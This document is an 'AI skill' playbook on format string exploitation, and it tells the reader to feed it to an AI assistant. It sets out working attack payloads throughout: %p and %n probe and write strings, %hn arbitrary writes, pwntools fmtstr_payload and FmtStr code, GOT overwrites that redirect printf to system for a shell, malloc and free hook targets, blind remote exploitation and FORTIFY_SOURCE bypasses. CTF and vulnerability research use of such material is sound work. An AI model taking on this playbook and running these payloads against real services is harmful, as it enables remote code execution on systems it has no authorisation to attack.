SKILL: Format String Exploitation — Expert Attack Playbook

AI LOAD INSTRUCTION: Expert format string techniques. Covers stack reading, arbitrary write via %n, GOT overwrite, __malloc_hook overwrite, pointer chain exploitation, blind format string, FORTIFY_SOURCE bypass, 64-bit null byte handling, and pwntools automation. Distilled from ctf-wiki fmtstr, CTF patterns, and real-world scenarios. Base models often miscalculate positional parameter offsets or forget 64-bit address placement after format string.

0. RELATED ROUTING

stack-overflow-and-rop — combine format string leak with stack overflow for full exploit
binary-protection-bypass — format string is the primary canary/PIE/ASLR leak method
arbitrary-write-to-rce — convert format string write primitive to code execution targets
heap-exploitation — heap address leak via format string for heap exploitation

1. VULNERABILITY IDENTIFICATION

Vulnerable Pattern

printf(user_input);          // VULNERABLE: user controls format string
fprintf(fp, user_input);     // VULNERABLE
sprintf(buf, user_input);    // VULNERABLE
snprintf(buf, sz, user_input); // VULNERABLE

printf("%s", user_input);    // SAFE: format string is fixed

Quick Test

Input: AAAA%p%p%p%p%p%p%p%p
If output shows stack values (hex addresses): format string confirmed
Look for 0x4141414141414141 in output to find your input offset

2. READING MEMORY

Stack Leak (%p)

Format	Action	Use
`%p`	Print next stack value as pointer	Sequential stack dump
`%N$p`	Print N-th parameter as pointer	Direct positional access
`%N$lx`	Same as %p but explicit hex (64-bit)	Portable
`%N$s`	Dereference N-th parameter as string pointer	Read memory at pointer value

Finding Your Input Offset

# Send: AAAAAAAA.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p
# Output: AAAAAAAA.0x7ffd12340000.0x0.(nil).0x7f1234567890.0x4141414141414141...
#                                                           ↑ offset = 6 (example)
# Or automated:
for i in range(1, 30):
    io.sendline(f'AAAA%{i}$p')
    if '0x41414141' in io.recvline():
        print(f'Offset = {i}')
        break

Leaking Specific Values

Target	Method	Stack Position
Canary	`%N$p` where N = canary offset from format string	Typically at offset buf_size/8 + few
Saved RBP	`%N$p` (just above return address)	Leaks stack address → stack base
Return address	`%N$p`	Leaks .text address (PIE base = leak & ~0xfff - offset)
Libc address	`%N$p` where N points to `__libc_start_main+XX` return on stack	libc base = leak - offset

Reading Arbitrary Address (%s)

# 32-bit: place address at start of format string
payload = p32(target_addr) + b'%N$s'  # N = offset where target_addr appears on stack

# 64-bit: address contains null bytes → place AFTER format specifiers
payload = b'%8$sAAAA' + p64(target_addr)  # %8$s reads from offset 8 where address is

3. WRITING MEMORY (%n)

Write Specifiers

Specifier	Bytes Written	Width
`%n`	4 bytes (int)	Characters printed so far
`%hn`	2 bytes (short)	Characters printed so far (mod 0x10000)
`%hhn`	1 byte (char)	Characters printed so far (mod 0x100)
`%ln`	8 bytes (long)	Characters printed so far

Arbitrary Write Technique

Goal: Write value V to address A.

32-bit (address on stack directly):

# Write 2 bytes at a time using %hn
# Place target addresses in format string (they'll be on stack)
payload  = p32(target_addr)       # for low 2 bytes
payload += p32(target_addr + 2)   # for high 2 bytes
# Calculate padding for each %hn write
low = value & 0xffff
high = (value >> 16) & 0xffff
payload += f'%{low - 8}c%{offset}$hn'.encode()
payload += f'%{(high - low) & 0xffff}c%{offset+1}$hn'.encode()

64-bit (address AFTER format string):

# Addresses contain null bytes (0x00007fXXXXXXXX) which terminate string
# Solution: place addresses AFTER the format specifiers

# Step 1: format string portion (no null bytes)
fmt = b'%Xc%N$hn%Yc%M$hn'
# Step 2: pad to 8-byte alignment
fmt = fmt.ljust(align, b'A')
# Step 3: append target addresses
fmt += p64(target_addr)
fmt += p64(target_addr + 2)

Byte-by-Byte Write with %hhn

Write one byte at a time for precision (6 writes for full 48-bit address on 64-bit):

writes = {}
for i in range(6):
    byte_val = (value >> (i * 8)) & 0xff
    writes[target_addr + i] = byte_val

# pwntools handles the math:
from pwn import fmtstr_payload
payload = fmtstr_payload(offset, writes, numbwritten=0, write_size='byte')

4. PWNTOOLS fmtstr_payload()

from pwn import *

# Overwrite GOT entry with target address
payload = fmtstr_payload(
    offset,                    # stack offset where input appears
    {elf.got['printf']: libc.symbols['system']},  # {addr: value}
    numbwritten=0,             # bytes already output before our input
    write_size='short'         # 'byte', 'short', or 'int'
)

# For 64-bit with addresses after format string:
# fmtstr_payload handles this automatically

FmtStr Class (Interactive Exploitation)

from pwn import *

def send_payload(payload):
    io.sendline(payload)
    return io.recvline()

fmt = FmtStr(execute_fmt=send_payload)
# fmt.offset is auto-detected
fmt.write(elf.got['printf'], libc.symbols['system'])
fmt.execute_writes()

5. GOT OVERWRITE VIA FORMAT STRING

Common Targets

Overwrite	With	Trigger
`printf@GOT`	`system`	Next `printf(user_input)` → `system(user_input)`, send `/bin/sh`
`strlen@GOT`	`system`	If `strlen(user_input)` called
`puts@GOT`	`system`	If `puts(user_input)` called
`atoi@GOT`	`system`	If `atoi(user_input)` called (send `sh` as "number")
`__stack_chk_fail@GOT`	Controlled addr	Bypass canary check entirely
`exit@GOT`	`main`	Create infinite loop for multi-shot exploit

Hook Targets (glibc < 2.34)

Target	One-gadget	Trigger
`__malloc_hook`	one_gadget addr	Any `printf` with large format → internal `malloc`
`__free_hook`	`system`	Trigger `free("/bin/sh")`

6. STACK POINTER CHAIN EXPLOITATION

When format string is not directly on the stack (e.g., stored in a heap buffer referenced by stack pointer), use pointer chains on the stack to achieve arbitrary write.

Two-Stage Write

Stack:
  [offset A] → ptr_X (stack address pointing to another stack address)
  [offset B] → ptr_Y (target of ptr_X)

Stage 1: Use %A$hn to modify ptr_X's low bytes → ptr_X now points to target_addr
Stage 2: Use %B$n to write through the modified ptr_X → writes to target_addr

This requires finding existing pointer chains on the stack (e.g., saved frame pointers forming a chain: rbp → prev_rbp → prev_prev_rbp).

Finding Pointer Chains

# Leak stack with %p, look for:
# 1. Stack address A at offset N that points to another stack address B
# 2. Stack address B at offset M
# Modify value at A (using %N$hn) to change where B points
# Then write through B (using %M$hn) to target

7. BLIND FORMAT STRING

Remote service, no binary, no source — exploit format string blind.

Methodology

Step	Action	Purpose
1	Send `%p` × 50	Dump stack, identify address patterns
2	Identify offsets	Find libc addrs (0x7f...), stack addrs (0x7ff...), code addrs
3	Find input offset	Send `AAAA%N$p` for N=1..50, find 0x41414141
4	Identify binary base	Code addresses reveal PIE base (or fixed base if no PIE)
5	Leak GOT entries	If binary base known, read GOT via `%N$s` with GOT address
6	Calculate libc base	GOT value - libc symbol offset
7	Overwrite GOT	`%n` to rewrite GOT entry with system address

8. FORTIFY_SOURCE BYPASS

FORTIFY_SOURCE (gcc -D_FORTIFY_SOURCE=2) replaces printf with __printf_chk which forbids %N$n (positional writes).

Bypass Techniques

Method	Detail
Use `%hn` sequentially (no positional)	Print exact byte count, `%hn`, adjust, `%hn` — fragile but works
Stack-based exploit	If format string is on stack, use non-positional `%n` with stack position control
Heap overflow instead	FORTIFY doesn't protect heap — combine with heap bug
Return-to-printf	ROP to call unfortified `printf` (if available in binary or libc)

9. 64-BIT CONSIDERATIONS

Challenge	Solution
Addresses contain `\x00` (null byte terminates format string)	Place addresses AFTER format specifiers, pad to alignment
Address width: 6 significant bytes	Write 3 × `%hn` (2 bytes each) or 6 × `%hhn`
Larger stack offset range	Input may be at offset 6+ due to 6 register args saved
48-bit address space	Only bottom 48 bits of 64-bit used

Layout Template (64-bit)

[format_string_specifiers][padding_to_8byte_align][addr1][addr2][addr3]...
 ← no null bytes here →                          ← null bytes OK (after fmt) →

10. DECISION TREE

Format string vulnerability confirmed (printf(user_input))
├── FORTIFY_SOURCE enabled? (__printf_chk)
│   ├── YES → positional %n blocked
│   │   ├── Sequential %n possible? → non-positional write
│   │   └── Combine with another primitive (heap, ROP)
│   └── NO → full positional %n available
├── What do you need first?
│   ├── Leak canary → %N$p at canary stack offset
│   ├── Leak PIE base → %N$p at return address offset → base = leak - known_offset
│   ├── Leak libc base → %N$p at __libc_start_main return on stack
│   ├── Leak heap base → %N$p at heap pointer on stack
│   └── Leak specific address → %N$s with target address on stack
├── Architecture?
│   ├── 32-bit → addresses at start of format string
│   └── 64-bit → addresses after format string (null byte issue)
├── Write target?
│   ├── Partial RELRO → GOT overwrite (printf→system, atoi→system)
│   ├── Full RELRO → __malloc_hook or __free_hook (pre-2.34)
│   ├── Full RELRO + glibc ≥ 2.34 → target _IO_FILE, exit_funcs, TLS_dtor_list
│   └── Stack return address → direct overwrite (if ASLR bypassed)
├── Single-shot or multi-shot?
│   ├── Loop (multi-shot) → overwrite GOT entry incrementally, use pointer chains
│   └── One-shot → fmtstr_payload() with all writes in single payload
└── Input not on stack? (heap buffer)
    └── Use stack pointer chains for indirect writes

format-string-exploitation

Safety Notice

Copy this and send it to your AI assistant to learn